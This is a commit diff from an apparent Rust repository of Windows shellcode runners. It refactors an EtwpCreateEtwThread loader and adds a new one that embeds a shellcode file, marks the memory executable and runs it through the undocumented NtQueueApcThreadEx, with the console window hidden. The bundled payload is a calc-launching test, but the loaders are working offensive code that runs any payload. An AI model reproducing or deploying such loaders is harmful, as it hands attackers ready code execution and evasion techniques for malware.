add nt_queue_apc_thread_ex_local

Author: test

etwp_create_etw_thread/src/main.rs

@@ -24,7 +24,10 @@ fn main() {
  return;
  }
 
- let etw = GetProcAddress(ntdll, "EtwpCreateEtwThread\0".as_ptr());
+ let fn_etwp_create_etw_thread = GetProcAddress(ntdll, "EtwpCreateEtwThread\0".as_ptr());
+
+ let etwp_create_etw_thread: extern "C" fn(*mut c_void, isize) -> HANDLE =
+ transmute(fn_etwp_create_etw_thread);
 
  let dest = VirtualAlloc(null(), SIZE, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
  if dest == null_mut() {
@@ -40,9 +43,7 @@ fn main() {
  return;
  }
 
- let etw: extern "C" fn(addr: *mut c_void, i: isize) -> HANDLE = transmute(etw);
-
- let thread = etw(dest, 0);
+ let thread = etwp_create_etw_thread(dest, 0);
 
  WaitForSingleObject(thread, WAIT_FAILED);
  }

nt_queue_apc_thread_ex_local/Cargo.toml

@@ -0,0 +1,9 @@
+[package]
+name = "nt_queue_apc_thread_ex_local"
+version = "0.1.0"
+edition = "2021"
+
+# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html
+
+[dependencies]
+windows-sys = { version = "0.45.0", features = ["Win32_System_Memory", "Win32_Foundation", "Win32_System_Threading", "Win32_System_LibraryLoader"] }

nt_queue_apc_thread_ex_local/src/main.rs

@@ -0,0 +1,46 @@
+#![windows_subsystem = "windows"]
+
+use std::ffi::c_void;
+use std::mem::transmute;
+use std::ptr::{copy, null, null_mut};
+use windows_sys::Win32::Foundation::{FALSE, HANDLE};
+use windows_sys::Win32::System::LibraryLoader::{GetProcAddress, LoadLibraryA};
+use windows_sys::Win32::System::Memory::{
+ VirtualAlloc, VirtualProtect, MEM_COMMIT, MEM_RESERVE, PAGE_EXECUTE, PAGE_READWRITE,
+};
+use windows_sys::Win32::System::Threading::GetCurrentThread;
+
+static SHELLCODE: [u8; 98] = *include_bytes!("../../w64-exec-calc-shellcode-func.bin");
+static SIZE: usize = SHELLCODE.len();
+
+#[cfg(target_os = "windows")]
+fn main() {
+ let mut old = PAGE_READWRITE;
+
+ unsafe {
+ let ntdll = LoadLibraryA("ntdll.dll\0".as_ptr());
+
+ let fn_nt_queue_apc_thread_ex = GetProcAddress(ntdll, "NtQueueApcThreadEx\0".as_ptr());
+
+ let nt_queue_apc_thread_ex: extern "C" fn(HANDLE, isize, *mut c_void, isize, isize, isize) =
+ transmute(fn_nt_queue_apc_thread_ex);
+
+ let dest = VirtualAlloc(null(), SIZE, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
+ if dest == null_mut() {
+ eprintln!("VirtualAlloc failed!");
+ return;
+ }
+
+ copy(SHELLCODE.as_ptr(), dest as *mut u8, SIZE);
+
+ let res = VirtualProtect(dest, SIZE, PAGE_EXECUTE, &mut old);
+ if res == FALSE {
+ eprintln!("VirtualProtect failed!");
+ return;
+ }
+
+ let handle = GetCurrentThread();
+
+ nt_queue_apc_thread_ex(handle, 1, dest, 0, 0, 0);
+ }
+}